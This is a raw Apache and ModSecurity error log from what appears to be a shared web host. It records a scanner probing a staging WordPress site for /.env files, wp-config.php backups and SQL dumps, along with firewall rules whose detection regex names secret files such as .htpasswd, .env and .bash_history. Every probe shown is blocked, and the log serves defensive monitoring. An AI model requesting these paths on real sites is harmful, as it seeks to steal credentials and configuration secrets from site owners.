[Tue May 26 15:31:10.342471 2026] [security2:error] [pid 715645:tid 715815] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXSAAAACg"]
[Tue May 26 15:31:10.362614 2026] [security2:error] [pid 715645:tid 715863] [client 195.178.110.199:41804] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXTAAAAFg"]
[Tue May 26 15:31:10.380715 2026] [security2:error] [pid 715645:tid 715898] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXTwAAAHs"]
[Tue May 26 15:31:10.387652 2026] [security2:error] [pid 715645:tid 715821] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXSwAAAC4"]
[Tue May 26 15:31:10.397510 2026] [security2:error] [pid 715645:tid 715828] [client 195.178.110.199:56004] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXUAAAADU"]
[Tue May 26 15:31:10.408728 2026] [security2:error] [pid 715645:tid 715814] [client 195.178.110.199:55942] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXUQAAACc"]
[Tue May 26 15:31:10.421397 2026] [security2:error] [pid 715645:tid 715822] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXVAAAAC8"]
[Tue May 26 15:31:10.495446 2026] [security2:error] [pid 715645:tid 715836] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXVwAAAD0"]
[Tue May 26 15:31:10.505126 2026] [security2:error] [pid 715645:tid 715891] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXWgAAAHQ"]
[Tue May 26 15:31:10.516772 2026] [security2:error] [pid 715645:tid 715854] [client 195.178.110.199:41818] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXWwAAAE8"]
[Tue May 26 15:31:10.558692 2026] [security2:error] [pid 715645:tid 715800] [client 195.178.110.199:55942] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/var/www/html/.env"] [unique_id "ahVvZnVGgMGh8k213RgXZQAAABk"]
[Tue May 26 15:31:10.569584 2026] [security2:error] [pid 715645:tid 715877] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXXgAAAGY"]
[Tue May 26 15:31:10.576633 2026] [security2:error] [pid 715645:tid 715876] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXYwAAAGU"]
[Tue May 26 15:31:10.594515 2026] [security2:error] [pid 715645:tid 715869] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXZAAAAF4"]
[Tue May 26 15:31:10.620447 2026] [security2:error] [pid 715645:tid 715858] [client 195.178.110.199:41804] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/web/.env"] [unique_id "ahVvZnVGgMGh8k213RgXZwAAAFM"]
[Tue May 26 15:31:10.628277 2026] [security2:error] [pid 715645:tid 715813] [client 195.178.110.199:41726] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXZgAAACY"]
[Tue May 26 15:31:10.663707 2026] [security2:error] [pid 715645:tid 715900] [client 195.178.110.199:56060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/var/www/.env"] [unique_id "ahVvZnVGgMGh8k213RgXbgAAAH0"]
[Tue May 26 15:31:10.680042 2026] [security2:error] [pid 715645:tid 715799] [client 195.178.110.199:41744] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXagAAABg"]
[Tue May 26 15:31:10.682607 2026] [security2:error] [pid 715645:tid 715819] [client 195.178.110.199:56030] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXawAAACw"]
[Tue May 26 15:31:10.703367 2026] [security2:error] [pid 715645:tid 715870] [client 195.178.110.199:56004] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXbQAAAF8"]
[Tue May 26 15:31:10.750173 2026] [security2:error] [pid 715645:tid 715872] [client 195.178.110.199:55942] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXcwAAAGE"]
[Tue May 26 15:31:10.752699 2026] [security2:error] [pid 715645:tid 715806] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXdQAAAB8"]
[Tue May 26 15:31:10.799923 2026] [security2:error] [pid 715645:tid 715818] [client 195.178.110.199:41818] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXdgAAACs"]
[Tue May 26 15:31:10.816935 2026] [security2:error] [pid 715645:tid 715786] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXegAAAAs"]
[Tue May 26 15:31:10.819794 2026] [security2:error] [pid 715645:tid 715884] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXfAAAAG0"]
[Tue May 26 15:31:10.828912 2026] [security2:error] [pid 715645:tid 715803] [client 195.178.110.199:41726] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXfQAAABw"]
[Tue May 26 15:31:10.830256 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:56030] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/website/.env"] [unique_id "ahVvZnVGgMGh8k213RgXfwAAAAM"]
[Tue May 26 15:31:10.861462 2026] [security2:error] [pid 715645:tid 715892] [client 195.178.110.199:41680] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/wp-config.php"] [unique_id "ahVvZnVGgMGh8k213RgXggAAAHU"]
[Tue May 26 15:31:10.880105 2026] [security2:error] [pid 715645:tid 715831] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXgQAAADg"]
[Tue May 26 15:31:10.926863 2026] [security2:error] [pid 715645:tid 715849] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXhQAAAEo"]
[Tue May 26 15:31:10.944646 2026] [security2:error] [pid 715645:tid 715844] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXiwAAAEU"]
[Tue May 26 15:31:10.948763 2026] [security2:error] [pid 715645:tid 715776] [client 195.178.110.199:55942] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXjQAAAAE"]
[Tue May 26 15:31:10.968808 2026] [security2:error] [pid 715645:tid 715790] [client 195.178.110.199:56088] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.staging.unsobered.com"] [uri "/wp-config.php.old"] [unique_id "ahVvZnVGgMGh8k213RgXkwAAAA8"]
[Tue May 26 15:31:10.978353 2026] [security2:error] [pid 715645:tid 715898] [client 195.178.110.199:56030] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/wp-content/mysql.sql"] [unique_id "ahVvZnVGgMGh8k213RgXlQAAAHs"]
[Tue May 26 15:31:10.983690 2026] [security2:error] [pid 715645:tid 715832] [client 195.178.110.199:56060] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXjwAAADk"]
[Tue May 26 15:31:10.985019 2026] [security2:error] [pid 715645:tid 715795] [client 195.178.110.199:56004] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.staging.unsobered.com"] [uri "/wp-config.php.bak"] [unique_id "ahVvZnVGgMGh8k213RgXlwAAABQ"]
[Tue May 26 15:31:11.009850 2026] [security2:error] [pid 715645:tid 715863] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXkgAAAFg"]
[Tue May 26 15:31:11.023472 2026] [security2:error] [pid 715645:tid 715828] [client 195.178.110.199:55968] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.staging.unsobered.com"] [uri "/wp-config.php.new"] [unique_id "ahVvZ3VGgMGh8k213RgXmQAAADU"]
[Tue May 26 15:31:11.128751 2026] [security2:error] [pid 715645:tid 715814] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZ3VGgMGh8k213RgXnQAAACc"]
[Tue May 26 15:31:11.231357 2026] [security2:error] [pid 715645:tid 715836] [client 195.178.110.199:55952] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZ3VGgMGh8k213RgXpAAAAD0"]
[Tue May 26 15:31:11.245355 2026] [security2:error] [pid 715645:tid 715791] [client 195.178.110.199:41744] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZ3VGgMGh8k213RgXpQAAABA"]
[Tue May 26 15:31:11.600910 2026] [security2:error] [pid 715645:tid 715652] [remote 5.78.119.122:52926] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.119.78.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahVvZ3VGgMGh8k213RgXrQAACQY"]
[Tue May 26 15:31:11.604400 2026] [security2:error] [pid 715645:tid 715807] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvZ3VGgMGh8k213RgXowAAACA"]
[Tue May 26 15:31:12.343527 2026] [security2:error] [pid 715645:tid 715654] [remote 185.230.216.227:54662] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.216.230.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahVvaHVGgMGh8k213RgXxAAAbwg"]
[Tue May 26 15:31:12.928116 2026] [security2:error] [pid 715645:tid 715896] [client 74.7.230.5:35576] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.karuppuswamykovil.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVvaHVGgMGh8k213RgX3QAAeVU"]
[Tue May 26 15:31:13.435212 2026] [security2:error] [pid 715645:tid 715805] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvaXVGgMGh8k213RgX4AAAAB4"]
[Tue May 26 15:31:14.326352 2026] [security2:error] [pid 715645:tid 715835] [client 196.51.103.244:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVvanVGgMGh8k213RgX_wAAADw"], referer: https://www.anujtradingco.com/
[Tue May 26 15:31:15.626784 2026] [security2:error] [pid 715645:tid 715767] [remote 217.112.89.35:46706] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahVva3VGgMGh8k213RgYGgAAdHk"]
[Tue May 26 15:31:15.664764 2026] [security2:error] [pid 715645:tid 715780] [client 196.51.103.244:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVva3VGgMGh8k213RgYIwAAAAU"], referer: https://www.anujtradingco.com/blog-2/blog-boxed-bigtext/?unapproved=1227640&moderation-hash=034c7eabab48907d504e06bce26b70a2
[Tue May 26 15:31:15.778890 2026] [security2:error] [pid 715645:tid 715897] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVva3VGgMGh8k213RgYGAAAAHo"]
[Tue May 26 15:31:18.111190 2026] [security2:error] [pid 715645:tid 715805] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvbXVGgMGh8k213RgYWAAAAB4"]
[Tue May 26 15:31:20.466139 2026] [security2:error] [pid 715645:tid 715830] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvcHVGgMGh8k213RgYsgAAADc"]
[Tue May 26 15:31:20.635838 2026] [security2:error] [pid 715645:tid 715781] [client 193.19.109.26:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVva3VGgMGh8k213RgYLQAABhg"]
[Tue May 26 15:31:21.894758 2026] [core:error] [pid 715645:tid 715796] [client 198.235.24.29:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:31:21.894779 2026] [core:error] [pid 715645:tid 715796] [client 198.235.24.29:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:31:22.669609 2026] [security2:error] [pid 715645:tid 715902] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvcnVGgMGh8k213RgY8wAAAH8"]
[Tue May 26 15:31:25.380901 2026] [security2:error] [pid 715645:tid 715809] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvdHVGgMGh8k213RgZNgAAACI"]
[Tue May 26 15:31:27.440982 2026] [security2:error] [pid 715645:tid 715893] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvd3VGgMGh8k213RgZcgAAAHY"]
[Tue May 26 15:31:29.307067 2026] [security2:error] [pid 715645:tid 715814] [client 14.173.20.91:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVveHVGgMGh8k213RgZtgAAACc"]
[Tue May 26 15:31:29.744126 2026] [security2:error] [pid 715645:tid 715815] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVveXVGgMGh8k213RgZyAAAACg"]
[Tue May 26 15:31:31.484671 2026] [security2:error] [pid 715645:tid 715890] [client 85.254.7.82:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVvenVGgMGh8k213RgZ6AAAAHM"]
[Tue May 26 15:31:32.343868 2026] [security2:error] [pid 715645:tid 715861] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVve3VGgMGh8k213RgaDgAAAFY"]
[Tue May 26 15:31:32.520754 2026] [security2:error] [pid 715645:tid 715797] [client 185.96.37.44:21311] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "abilitypneumaticsystems.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVvfHVGgMGh8k213RgaHQAAABY"]
[Tue May 26 15:31:34.575469 2026] [security2:error] [pid 715645:tid 715882] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvfnVGgMGh8k213RgaQAAAAGs"]
[Tue May 26 15:31:36.769490 2026] [security2:error] [pid 715645:tid 715876] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvgHVGgMGh8k213RgafAAAAGU"]
[Tue May 26 15:31:37.706298 2026] [autoindex:error] [pid 715645:tid 715799] [client 43.128.67.187:50360] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:31:38.801163 2026] [security2:error] [pid 715645:tid 715812] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvgnVGgMGh8k213RgaqwAAACU"]
